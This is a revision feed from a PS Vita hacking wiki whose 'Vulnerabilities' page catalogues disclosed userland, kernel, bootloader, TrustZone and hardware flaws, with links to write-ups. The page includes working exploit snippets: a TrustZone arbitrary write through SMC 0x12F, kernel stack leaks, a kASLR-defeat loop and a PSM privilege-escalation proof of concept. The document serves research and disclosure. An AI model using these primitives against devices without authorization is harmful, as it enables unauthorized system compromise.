<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code> which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory) and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table that all points to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it almost requires no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style of glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
=== Boot ROM Enc buffer overflow ===<br />
<br />
(2019-08-30) The development boot ROM does not check [[Enc]] header correctly. Specifically, the "code size" field (at offset 0x10) is only checked after adding it to "offset to code". The calculation can overflow, for example, when <code>code_size == -offset_code</code>. Further, when loading an Enc binary from ARM, the size to copy in is calculated with <code>(scratch->code_size + scratch->offset_code) - 0x40</code>. Now that the sum of code_size and offset_code is 0, this calculation would underflow to -0x40, or 0xffffffc0, resulting in a huge amount of data being copied in and overwriting parts of the boot ROM.<br />
<br />
== F00D Processor ==<br />
<br />
=== second_loader ===<br />
<br />
==== moth exploit ====<br />
(2019-02-05) second_loader does not check idstorage factory firmware version padding after decryption. In order to verify the factory firmware version number, the binary blob from idstorage is decrypted using a console-specific key, verified using RSA, then decrypted again using a different console-specific key. At no point does it check that the padding of the final decryption is valid. This lets us transplant the block from one console to another by decrypting the outer layer on the donor console and encrypting it on the target. As the second key is different on the target console, after the final decryption we end up with random garbage. However, because the version number is a 4-byte integer, with a probability of 1/256 the major byte of the version would be 00, resulting in a factory firmware of "0.garbage". This effectively lets us bypass the factory firmware check implemented in second_loader and downgrade below the factory firmware, provided that enough samples of the signed blob are collected.<br />
<br />
=== secure_kernel ===<br />
<br />
==== octopus exploit ====<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
==== Heap buffer overflow in update_service_sm ====<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11506Vulnerabilities2019-09-18T23:01:37Z<p>Xyz: /* F00D Processor */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) (CVE-2010-4577 and CVE-2010-1807) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.72) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next PSVita kernel exploit, named 2050 and 2051. TheFloW also have a WebKit exploit and it may be same or different than xyz's.<br />
<br />
Working on <= 3.72. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall id (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall id passed in R12 can overflow syscall table and cause an arbitrary kernel function pointer to be dereferenced then executed.<br />
<br />
Tested on 1.50-1.60. Patched on 1.61.<br />
<br />
=== Syscall handler leaks syscall table vaddr ===<br />
<br />
Calling svc with an invalid syscall id will end the svc interrupt without clearing syscall table vaddr in r0.<br />
<br />
Tested on 1.50. ?Patched on 1.61?<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
